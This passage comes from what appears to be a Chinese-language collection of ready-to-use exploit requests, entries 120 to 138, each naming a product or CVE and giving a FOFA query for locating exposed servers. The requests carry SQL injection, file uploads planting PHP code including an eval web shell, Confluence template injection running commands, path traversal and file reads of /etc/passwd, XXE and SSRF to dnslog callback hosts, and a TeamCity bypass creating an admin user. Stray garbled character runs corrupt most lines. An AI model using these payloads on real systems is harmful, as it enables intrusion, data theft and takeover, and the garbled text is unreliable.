: O* S! H8 O5 u: i) l! f1 S, e3 {X-Forwarded-For: 1.1.1.16 m' }3 U+ M! \0 @; j/ n
X-Originating-Ip: 1.1.1.1
7 I8 ]4 n1 r8 G# b" M8 vX-Remote-Ip: 1.1.1.18 R" ]- }; l. \# o8 c
X-Remote-Addr: 1.1.1.1
8 e) f% r0 d/ o* |! r: r' _Te: trailers+ p9 g; V( q) M+ a' j/ k
Connection: close
$ @5 {' U! P" i2 Q( Z4 f8 A/ T1 n0 G( M
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
# O1 }3 d& t- B- [- O" w- m$ t! h% O2 }
5 b" T+ \! l7 ^120. 北京百绰智能S40管理平台导入web.php任意文件上传
9 Q* N2 J8 q$ [ ACVE-2024-1253
2 z+ r; x2 k1 G( O) _2 f3 h1 \2 K% {FOFA:title="Smart管理平台"
. m/ S; P* G0 I4 \. e5 R. wPOST /useratte/web.php? HTTP/1.1
" x* r. F9 i: n) t! N" U- G5 IHost: ip:port4 q5 o$ V5 F+ m- n0 A; R
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db. k4 O$ K: @9 i3 I
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko& v, Y& Y% M, q6 c- T, u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 [- z w7 c6 {: ^0 Q7 j/ {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 E- k' J3 |% \; Q z9 W7 i. P% n$ z( sAccept-Encoding: gzip, deflate
7 p' r" M, R# ?* ~0 c: YContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793282 r5 D9 F+ R6 c9 u5 r8 M5 `
Content-Length: 597$ V) D6 s, M; V4 h. Q* ~
Origin: https://ip:port
0 _- P B, A# m: ?9 Q0 G1 t) |3 W* ZReferer: https://ip:port/sysmanage/licence.php, K7 F; N3 Y. y8 |4 p
Upgrade-Insecure-Requests: 1
- r- j/ q* q: ^; C; w" q* WSec-Fetch-Dest: document9 E! g6 c9 J& ?) T
Sec-Fetch-Mode: navigate
, M" _0 ]' O( a# ISec-Fetch-Site: same-origin
3 i4 ~+ X% S8 e6 ~- R& LSec-Fetch-User: ?1/ g7 v+ I3 Q. i+ F$ Z' L
Te: trailers$ J. {0 j) U# r9 x* r" W8 t
Connection: close# y i* m) Y. ?5 o% R" w
/ S5 B+ R0 E0 L6 @4 j- w
-----------------------------42328904123665875270630079328) O! v; n5 {- I7 V
Content-Disposition: form-data; name="file_upload"; filename="2.php"
, u. m$ G+ z* p7 f cContent-Type: application/octet-stream0 ~4 C$ N, E# v8 d4 a
: }5 Q( d4 Y: C<?php phpinfo()?>3 [, Y/ v# ~) z2 h
-----------------------------423289041236658752706300793287 S: j/ w" h, r: X: u5 u+ n9 W
Content-Disposition: form-data; name="id_type"
. W$ n* m/ R7 O I- T2 K
! S# F: O+ d& U5 \$ h1/ Q7 f' h" u/ x! G/ h' m4 q4 D/ ^% N# Y
-----------------------------42328904123665875270630079328
9 A, t9 w6 z- A. f, dContent-Disposition: form-data; name="1_ck"
1 D3 v5 |" e+ P4 T, q* V
( r$ p: S, z- l o' y1_radhttp
4 ~) t N+ \6 c, V: b4 [-----------------------------42328904123665875270630079328
+ P) f1 }8 W: K0 B$ Q5 b! LContent-Disposition: form-data; name="mode"
, [7 \# B4 q6 t* F6 b8 c- x' B$ h- Y9 f
import# Q2 |# r* ~9 b" u( q: n
-----------------------------42328904123665875270630079328
$ p/ x) t3 Q* Q3 M# f2 C$ Z/ z% ~
/ O P% e% ^: s6 f文件路径/upload/2.php
7 S4 c0 b3 [: z' b8 F% o
4 @, t9 H" ?4 f( P4 X" l% I# e9 d121. 北京百绰智能S42管理平台userattestation.php任意文件上传( C7 u8 n' N& A
CVE-2024-19189 q7 s% j" z) \' k5 V# }, ?
FOFA:title="Smart管理平台"
# h8 h- N8 n& N% mPOST /useratte/userattestation.php HTTP/1.16 S- c! J% O3 n9 ~5 n- K6 z
Host: 192.168.40.130:8443: I, ?4 H& d- _0 B$ j
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac501 p, ?# {4 w: I
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
t% Q. d& n9 ?0 V: C8 q; dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: a: ` Q5 _7 Y6 y O- s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, K) [& Q2 X$ u" WAccept-Encoding: gzip, deflate
7 e, S; h, j# a. TContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
/ C- r8 T* O' z5 a A7 }# J3 hContent-Length: 592
0 V8 S1 l% U" A2 V/ y$ JOrigin: https://192.168.40.130:8443* r! r6 o; V! F0 t" W
Upgrade-Insecure-Requests: 1
|4 ]! P3 Y3 M# ZSec-Fetch-Dest: document9 |" _6 |# ?# _, O+ c. Y
Sec-Fetch-Mode: navigate
# y+ [3 O+ |' e+ s/ QSec-Fetch-Site: same-origin
. x* U! Z5 O& k4 OSec-Fetch-User: ?1. I+ x4 w3 B& K& _6 r
Te: trailers
. c1 J; n7 Q* t8 ]9 _Connection: close+ J, q0 `$ d& y' E, L
& R3 ?( w, B" u% F1 q0 D$ x$ K( C6 `
-----------------------------42328904123665875270630079328: s1 H" D& f, b" X: S; q
Content-Disposition: form-data; name="web_img"; filename="1.php"
$ ]9 o. ?4 V" B& _+ B3 jContent-Type: application/octet-stream
( a2 N5 I# i0 \5 F9 S9 ^
5 K( R" P3 @7 D9 O# _, k<?php phpinfo();?>( J- f& j" E0 s- E' ^
-----------------------------42328904123665875270630079328
' ] X' ?( Z% M3 bContent-Disposition: form-data; name="id_type"* ]: c- T5 g; ?4 o; A- `! _1 g
0 w3 }" Q& t' f4 @0 u
1' B K& L+ L6 Z, G1 I9 a
-----------------------------42328904123665875270630079328. p5 A% l W8 ?( C* F3 u/ ]- r
Content-Disposition: form-data; name="1_ck"% H' X: I4 n" t7 n- S; n) P( W
: ]' S$ T; n/ p% h8 g1_radhttp
0 q) f7 v) h5 m4 |9 \-----------------------------42328904123665875270630079328
$ E3 d. y- s [; ~Content-Disposition: form-data; name="hidwel"
- Y( m( h! F5 v } Y) A# s7 d3 |( R f/ y
set9 i2 s0 q, |) t/ Y. R( @+ ~& Z9 w/ b
-----------------------------42328904123665875270630079328
; ~* X3 z$ ]& {
% F' h/ I! Y0 W1 w+ s* Y; f% g) y3 E2 i( l5 @3 F q; B
boot/web/upload/weblogo/1.php
6 }0 D+ N( S5 m
. v0 L2 a: Q, H; C' C& u3 D. o) z122. 北京百绰智能s200管理平台/importexport.php sql注入$ u/ `; Y) W" i$ X' j
CVE-2024-27718FOFA:title="Smart管理平台"
( l0 y! |1 h1 d. u' M! {, ^其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
. B% m! _$ `+ e% k1 a- vGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
2 U$ A h) X' g* `4 r( vHost: x.x.x.x4 e* a! L. y L+ K) N
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
& D T9 }/ ?8 x- nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 S6 K6 X! k m; h; X! S& UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 {! m; U a9 r8 G) |5 R$ R3 G \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 G5 H) @0 \8 I+ q( Y) N
Accept-Encoding: gzip, deflate, br
5 ]+ v% }' V0 W& V2 Q5 {; KUpgrade-Insecure-Requests: 1; ` P. B8 }# h% M# v7 j" U) T# C% C
Sec-Fetch-Dest: document
+ t4 X1 ^9 m3 K" W# N& d4 r- C- ]Sec-Fetch-Mode: navigate% `( @% i4 w, q: @, v9 g2 e) N4 u
Sec-Fetch-Site: none9 f o! w+ T1 a9 c6 H- A1 U
Sec-Fetch-User: ?13 _1 Y8 f7 f( M; k {
Te: trailers" C: S: B |$ E& u
Connection: close+ n3 x& D' ]7 j7 S( P2 W
7 o. [7 j- E8 P4 f9 I
& ] s& z5 ?( h& G
123. Atlassian Confluence 模板注入代码执行
6 ?9 @; @8 v/ @1 @& Z1 [FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
9 s0 c4 _ z$ L- B6 _POST /template/aui/text-inline.vm HTTP/1.15 k* C" q2 ^( |2 M2 B" }) E& j
Host: localhost:8090
* r. h, U r5 E/ mAccept-Encoding: gzip, deflate, br
( F- ^2 I) K: D% G2 GAccept: */*# S2 [" s5 f2 h& v
Accept-Language: en-US;q=0.9,en;q=0.8
& X2 U; |( R* u C% PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
1 d. Z* P& H4 J6 y! tConnection: close m" r D" i" @8 M3 k# t: O$ c
Content-Type: application/x-www-form-urlencoded& E' V$ M% ?# p8 _: H+ F+ V3 Y
! y- o. _2 {4 |
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
7 O. v4 \6 l5 y) }7 N S5 ]2 d4 f6 O
3 z5 a& W) U; v5 Y9 a$ s
1 P2 j+ m( c: C3 s124. 湖南建研工程质量检测系统任意文件上传
R6 X$ H% N; J9 z8 I3 Z# u; uFOFA:body="/Content/Theme/Standard/webSite/login.css"
' {- Y7 \! t& r7 D) D3 K' JPOST /Scripts/admintool?type=updatefile HTTP/1.1; u0 x/ Q6 h% o5 k1 O2 k, W5 s
Host: 192.168.40.130:82821 V! R h/ b8 Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 H3 w, j) N- e6 u9 h3 x2 @Content-Length: 72' y& t4 l1 U3 B2 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
% O3 f6 S1 p* Z9 vAccept-Encoding: gzip, deflate, br0 w* o# _7 y: {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 m `: G1 ]8 f/ V2 C
Connection: close
8 W8 J3 j3 V3 K4 g; j* J& o% zContent-Type: application/x-www-form-urlencoded
* c8 F) X9 V- j: M4 w* J; @* t5 |
& w4 i4 x a. e4 {+ M' l3 X6 Z$ tfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
% v1 h K2 y% Q0 a. h/ s
4 K) H- S: d* }+ [9 G8 }1 D' V# a8 i [- f
http://192.168.40.130:8282/Scripts/abcgcg.aspx
( n0 Z; y: f5 n; y2 b, b( @
5 G8 [) l+ o$ H+ K- ^/ g8 ^125. ConnectWise ScreenConnect身份验证绕过6 U; N4 `; o% D: n8 W1 s, B+ p
CVE-2024-1709
2 h, x5 ?8 o5 q0 j3 bFOFA:icon_hash="-82958153"
( O1 h g- r' g6 h4 [$ }https://github.com/watchtowrlabs ... bypass-add-user-poc
( } ]+ d$ b1 o9 s; r
$ G) w' x8 L5 D$ T) Q' Q2 u2 i$ ]% C6 r8 @% W+ i! ^
使用方法! X4 M+ r6 G: ?) N
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
; G/ C, P& s9 |9 `; S3 \; j, `& h4 H- b; p
. p8 i! W) q+ F7 w1 w
创建好用户后直接登录后台,可以执行系统命令。
( p7 b0 l, G2 ?8 ]9 d. V7 t4 @. D" L% H2 l
126. Aiohttp 路径遍历8 N; B3 D. r8 G& @$ I# v
FOFA:title=="ComfyUI"2 }( `4 X, b) ^& \# S
GET /static/../../../../../etc/passwd HTTP/1.16 O' L1 C$ Q3 h9 k! ^3 E* w+ @7 ?
Host: x.x.x.x1 f; m* V2 P& g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
" v2 I4 ^* R! J% h1 z D1 TConnection: close) R6 s1 [ D7 ^( o) ?
Accept: */*, c! q- C2 S# ^) e& V
Accept-Language: en
8 V$ B; r2 a- N) A9 m- MAccept-Encoding: gzip
; [9 Y! O& \( p b+ i p1 ?4 M2 w: R
9 C; D v3 Q; @$ b* k% B! C6 i' ?. c& U
127. 广联达Linkworks DataExchange.ashx XXE
! c% E+ U$ n* K6 CFOFA:body="Services/Identification/login.ashx" - }8 r/ M: Z# L+ @* @4 M$ j |
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.13 ^3 e, R! y H6 [$ l% `7 w
Host: 192.168.40.130:8888
# F l9 ~/ M& G0 L( d) q! UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
' {" O# o! O" |* A8 U0 d2 i+ DContent-Length: 4153 } S1 T* E1 o6 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ n/ P5 D+ C/ V5 U `7 o4 p
Accept-Encoding: gzip, deflate
5 d- Q1 w% r H: L& s6 T7 m, tAccept-Language: zh-CN,zh;q=0.9' ?) ]3 \2 G& |8 |! {, W) D. `/ c
Connection: close) x0 e0 K) e# @- c3 p
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0& Y# X% R3 K7 ]) `8 z# j) a
Purpose: prefetch4 R, l8 \( ~% d& C( l
Sec-Purpose: prefetch;prerender
$ S) x1 o+ ]6 K4 A, T7 @ w- {& T6 D+ @2 z1 v$ P8 F4 j% ~
------WebKitFormBoundaryJGgV5l5ta05yAIe0
+ ?) J ?- J0 R' x( y& o6 |0 hContent-Disposition: form-data;name="SystemName"" A4 N0 ]/ F1 S3 j6 \5 c' m
( q* U8 z% C( `2 R e
BIM
4 o* @, i7 K3 I7 v, L3 G" g8 d+ Q! V------WebKitFormBoundaryJGgV5l5ta05yAIe0
3 T# y0 T. a/ J9 N2 I CContent-Disposition: form-data;name="Params"! m0 t3 b+ Y8 S
Content-Type: text/plain
5 }4 p8 D4 ]% v
* S/ w' G( e* ]2 Q<?xml version="1.0" encoding="UTF-8"?>
3 J- C6 [( n6 g5 F<!DOCTYPE test [
8 ~# y# u$ H; r5 z1 b<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">* u( J9 h. `' I" f
]
7 B8 q- ^" C, t$ }># S' x# d- Q6 W9 T7 a' J
<test>&t;</test>: ?3 C( u2 V# _" U& d
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
0 l/ g0 P2 w' h# {- Q9 c5 Q( j
I$ z( s! f( R4 S6 `
. t+ v- T, n5 | ?/ b; C! M. W3 u% U( h, g; Z0 c" x" k* G1 v2 ^8 F% r- N
128. Adobe ColdFusion 反序列化
# N5 U0 h- z( ?# N/ G$ Q" v; g) F; pCVE-2023-38203( f; F* }- v: L6 j+ w1 I
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
0 R) o+ X$ H% L n' JFOFA:app="Adobe-ColdFusion"
3 K, Q, |$ b8 N* CPAYLOAD
/ D2 [( @1 }1 B6 H# [8 n3 E
^& C5 Y& X) |129. Adobe ColdFusion 任意文件读取/ T6 L/ @ V/ ~; J& C4 M2 O
CVE-2024-20767' n8 c; X6 d9 E- K% i5 V* D
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
' J7 B! c$ P# P: c- a, M第一步,获取uuid
+ E5 c6 L: d7 A4 V; VGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
" a# ?7 J- S7 O6 UHost: x.x.x.x G# U# G% I8 C, D( M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36+ r8 E; X @6 U" S1 U8 o
Accept: */*
3 t' F# M3 V( |Accept-Encoding: gzip, deflate
' L) T2 Z8 Q3 x% R6 C$ W" X1 PConnection: close7 _0 K) |. P. l/ n8 n" p
5 ?& s; {+ l+ f+ i. a" {/ L2 d+ G9 K# F/ f; v0 z) n
第二步,读取/etc/passwd文件' B( V; x( v; f9 S6 i
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
& B' o% d* L7 [: d9 F2 JHost: x.x.x.x
$ d% B" b0 ^& n$ _" l+ UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: l, f. D# W2 j. D" E
Accept: */*( c4 v5 B' |. u3 g
Accept-Encoding: gzip, deflate
1 r9 Z e! s# G! Y; B5 vConnection: close) ]( y4 x! K# ~9 X
uuid: 85f60018-a654-4410-a783-f81cbd5000b93 B6 b* b5 \1 D5 i- m, \, Y+ E1 O
* x! ^; U3 O# }4 t, e3 Y1 c4 _/ b( J N
130. Laykefu客服系统任意文件上传
7 h' m* g( M, \$ _FOFA:icon_hash="-334624619") ?) @! S5 s* S, Y7 a' j
POST /admin/users/upavatar.html HTTP/1.1
5 G" r& [9 g* B1 V$ tHost: 127.0.0.16 M, z2 \- z! [: ]4 N
Accept: application/json, text/javascript, */*; q=0.01- p+ n2 S. _# _" I$ \; U
X-Requested-With: XMLHttpRequest2 ~% u/ O: D* D. X' G0 \- T% S7 v
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26! v. c4 T/ ~3 S5 Y0 O5 @3 s+ A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
* |: U$ J( j8 QAccept-Encoding: gzip, deflate
+ Y; } M' ^$ Z* ]3 x3 ^& NAccept-Language: zh-CN,zh;q=0.9
) ~" j/ C$ u5 _% u/ v5 t* \+ iCookie: user_name=1; user_id=3
& H3 K. f3 ^/ X6 k3 n- z% s1 qConnection: close
5 U" s3 \; N3 Y% V* D+ ^# n, z- G; S/ {* T
------WebKitFormBoundary3OCVBiwBVsNuB2kR1 y. v* o" [" r, ]
Content-Disposition: form-data; name="file"; filename="1.php"
8 c6 a0 o6 ?6 a7 a4 \6 }Content-Type: image/png
7 j9 i$ L" d) b+ R8 T6 d
' z# x& [. [- o2 F5 Z<?php phpinfo();@eval($_POST['sec']);?>
' E4 S6 k& U% ?9 ~. J& U------WebKitFormBoundary3OCVBiwBVsNuB2kR--- t: ~+ K! Q+ w3 P
1 R! A: {: h+ Y7 b; Y% G3 _- K
/ r* x1 D4 \8 e: \: l( u" N131. Mini-Tmall <=20231017 SQL注入8 u! P( a3 q, z, e
FOFA:icon_hash="-2087517259"1 T3 @# M. C/ O# f/ w* o1 |6 H& r- w" a
后台地址:http://localhost:8080/tmall/admin9 }3 R* L9 I& i) h
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)7 {* D) K; Y: w4 M5 ]
3 [$ M+ \& w. A) K4 j132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
1 f( A, _8 [: {* u4 R iCVE-2024-27198+ u5 c$ R( ^1 z) j" `
FOFA:body="Log in to TeamCity"
' r# b$ n4 `+ LPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.13 s0 ]2 n+ m; R7 T# O
Host: 192.168.40.130:8111. @: R+ Y3 G; b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) s; G- ~- M5 r/ M O
Accept: */*
" H; g4 R8 o3 V9 ]4 p1 z# m- O5 CContent-Type: application/json8 a8 B( f9 N. ^) P8 _, n) f
Accept-Encoding: gzip, deflate
, F' F, y' j0 [( v4 I1 U' [- M
& f0 `( q/ k/ \$ u" S{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}4 _1 m" E0 @( l* c$ s% ?3 J
4 K( s z' {/ i0 c; K' ]& E2 Q# q% E; {
CVE-2024-27199
; ?4 D u+ K$ u/ s, k/res/../admin/diagnostic.jsp4 Y. I/ I% z( `0 Y- D. E
/.well-known/acme-challenge/../../admin/diagnostic.jsp
: i/ j9 @" D3 W( K/ c7 C/update/../admin/diagnostic.jsp
0 [, p+ s+ T" ]& a% ]
. ]' ]* ~' L! V2 q* h' q$ W5 ?3 t6 V. Z8 Y
CVE-2024-27198-RCE.py
& e6 M8 o! [8 b5 }" i+ p% O
2 {% [* v$ M; c( D8 t/ z133. H5 云商城 file.php 文件上传! }1 D+ |% E: [2 ~ l
FOFA:body="/public/qbsp.php"4 Z' i4 a% ^1 w# q- f b1 E+ u I
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
" ]8 x( {. Q6 X6 }Host: your-ip% }/ ?! e% I/ i `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36: ]; l# \) _9 \4 F( M
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
" A4 ?3 q( @0 L1 d% D6 @3 _. `2 [6 A* J
------WebKitFormBoundaryFQqYtrIWb8iBxUCx$ o$ }0 {- Z) c3 X8 M* _
Content-Disposition: form-data; name="file"; filename="rce.php" F' u) `0 X Q( ~1 u/ s/ ]$ W/ g
Content-Type: application/octet-stream
2 ^( I- q& Q2 |
) N% L7 W% O9 r E<?php system("cat /etc/passwd");unlink(__FILE__);?>
! d4 y, K0 {$ H+ V------WebKitFormBoundaryFQqYtrIWb8iBxUCx--; L9 y! D* t5 s( U- T ?
5 Y, t) I F k- i% [8 J# \1 E; G) e) a9 W4 `! ^
0 U0 j8 h/ t' C' V% K& m' q
134. 网康NS-ASG应用安全网关index.php sql注入
3 K# A1 s+ R$ F8 w- wCVE-2024-2330$ Q# O; ]' Y0 G; Y
Netentsec NS-ASG Application Security Gateway 6.3版本) w' Y. ^6 U9 ~/ I6 K
FOFA:app="网康科技-NS-ASG安全网关"( z: L, t( k# ^- O
POST /protocol/index.php HTTP/1.1; y* z% N* H3 w" E
Host: x.x.x.x" O5 C, h2 D& c4 g9 k0 Q$ F" G
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de) V7 y0 F8 M* c2 Q; F7 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0/ i: M5 C" M% O, c( Z( W
Accept: */*% h$ U' p3 c) h) I1 o+ X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, n" a9 O0 t# A" E. V9 x, eAccept-Encoding: gzip, deflate
& C0 R* B, F& s1 N! w. MSec-Fetch-Dest: empty* w' q; S r; C+ b& x
Sec-Fetch-Mode: cors
8 e) g$ k7 Y( A+ [; s+ t" cSec-Fetch-Site: same-origin
( z8 N3 @& J1 R4 S9 `Te: trailers1 N: K* B1 |6 _2 ]+ c U0 [" f
Connection: close& a' d$ m3 D4 E2 u; c
Content-Type: application/x-www-form-urlencoded k h, E/ p1 B4 b
Content-Length: 263* N; N# L7 j$ P; f: ~
2 h* O+ g5 k+ R: c; @% G" ojsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
% G0 [9 O4 V9 ?& z; G( X& L6 Z5 ?( _! e! k! R
4 O6 o1 K. `! V0 J135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
% k& k. e0 Z+ HCVE-2024-20224 V2 [# D, z+ u& D* ?! a* D
Netentsec NS-ASG Application Security Gateway 6.3版本8 H& D/ ] ]5 D
FOFA:app="网康科技-NS-ASG安全网关"
) V* I; d" W! {) R2 C+ _# ^GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1; P2 l$ {6 @, ^
Host: x.x.x.x
: M: y# ^) O- c, |/ m% m0 W# rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
% k2 T2 `) p3 A- x) MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 Y& |5 r$ B) W! o9 M/ Q* {1 MAccept-Encoding: gzip, deflate
, I! e2 ?: `4 Y$ H2 I0 ^9 J! u9 cAccept-Language: zh-CN,zh;q=0.9" _. G( a9 {" h5 d, O
Connection: close
7 f( j: q1 h2 [# ~$ n; V5 l1 V4 Z z
( p) v( ` ?4 B7 v: q+ z# W% j- I4 t' D3 v" s$ o* U$ H1 n& k
136. NextChat cors SSRF1 Q( x; ^) V3 r% c3 @* V4 E. \
CVE-2023-49785
( O, Z: a7 a7 C: V0 TFOFA:title="NextChat"
+ t1 H/ q4 T) O# f3 vGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1- x$ ?$ z' l: ?" W3 Q
Host: x.x.x.x:10000- x3 u1 J0 S3 l* ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" a. Q' o! F; n, z- ]
Connection: close
5 y% ~) ~, Y* j# I) |3 k0 NAccept: */*
0 w, V& V0 W d( g6 n/ e/ ]+ _Accept-Language: en* P9 |5 L1 P b5 ~3 W9 W9 M
Accept-Encoding: gzip
2 w3 h9 h, K9 v- F
: {+ b% K) G0 n$ B/ H/ x
( _* q/ U; u" n$ H4 p137. 福建科立迅通信指挥调度平台down_file.php sql注入
3 M) s8 d3 h* c: wCVE-2024-2620) I" p+ A* H/ E- s! ?
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
6 s' O" P$ q( }5 sGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1# O7 u, u* C) e, ~
Host: x.x.x.x
5 P* V( L. u6 p& X' _- E+ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 i7 f ]6 Q! d4 r5 O) |; B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 a) h) V/ U+ Q% I- i( T2 B/ z& P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 X" }( C7 d! E$ z1 J* L
Accept-Encoding: gzip, deflate, br" r! D4 d, [: \8 T) ^) ]
Connection: close# A, _: ]3 Y+ w8 A
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
- l. h' L; Y6 T; V- BUpgrade-Insecure-Requests: 1
1 F) A: w$ H: c2 e+ n( b
5 k7 U3 j3 e. ]3 H& K: P
, E" {8 I% U4 v3 Y138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
4 Y7 ~4 y5 h! K1 D; }CVE-2024-26212 u% I$ N' r. F9 K7 u0 Y! [) F
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"* ~% A2 S7 {4 t# Y, E8 [
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1# R/ S. N; }7 }% D
Host: x.x.x.x
3 v* R( r' {$ h+ o5 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; M; \7 g" S7 ?/ k4 g( `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 h, |! u; \2 `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ E* U' h8 [5 `' ~- XAccept-Encoding: gzip, deflate, br
2 `) D7 M- @' H$ sConnection: close
0 m$ \( S8 C$ {Upgrade-Insecure-Requests: 1* z, J+ j& X6 U9 a2 W1 x$ }. q
, d( E; ?) x4 K3 C( [8 B
